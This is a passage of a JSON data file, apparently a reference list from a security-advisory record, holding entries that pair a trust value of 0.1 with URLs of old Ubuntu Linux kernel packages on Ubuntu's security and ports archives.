        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.32_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
